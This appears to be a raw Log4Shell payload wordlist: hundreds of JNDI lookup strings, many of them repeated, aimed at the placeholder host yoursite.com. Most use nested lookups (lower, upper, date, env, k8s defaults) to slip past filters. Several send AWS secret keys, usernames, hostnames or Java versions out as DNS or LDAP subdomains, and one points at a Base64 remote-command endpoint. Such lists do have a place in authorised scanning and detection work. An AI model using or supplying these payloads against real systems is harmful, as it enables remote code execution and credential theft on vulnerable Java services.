${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${jndi:ldap://${hostName}.yoursite.com/a}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${jndi:ldap://${hostName}.yoursite.com/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${jndi:ldap://${hostName}.yoursite.com/a}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:rmi://yoursite.com},
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://yoursite.com:80/a}
${jndi:rmi://yoursite.com},
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${jndi:rmi://yoursite.com},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:ldap://yoursite.com/a}
${jndi:rmi://yoursite.com}
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${jndi:rmi://yoursite.com}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${jndi:rmi://yoursite.com}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${jndi:ldap://${env:user}.yoursite.com/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${jndi:dns://${hostName}.yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${jndi:dns://${hostName}.yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${jndi:dns://${hostName}.yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${jnd${upper:i}:ldap://yoursite.com:80/a},
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jndi:dns://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${jndi:dns://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${${date:'j'}ndi:dns://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:dns://yoursite.com:80/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${jndi:dns://yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${${date:'j'}ndi:dns://yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${jndi:ldap://${hostName}.yoursite.com/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${jndi:ldap://${env:USER}.yoursite.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${jndi:dns://yoursite.com:80/}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${jndi:ldap://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${jndi:ldap://yoursite.com:80/a}
${jndi:rmi://yoursite.com},
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jndi:rmi://yoursite.com},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${jndi:ldap://${hostName}.yoursite.com/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://${env:USER}.yoursite.com/}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${jndi:dns://yoursite.com:80/}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://yoursite.com:80/a}
${jndi:rmi://yoursite.com},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
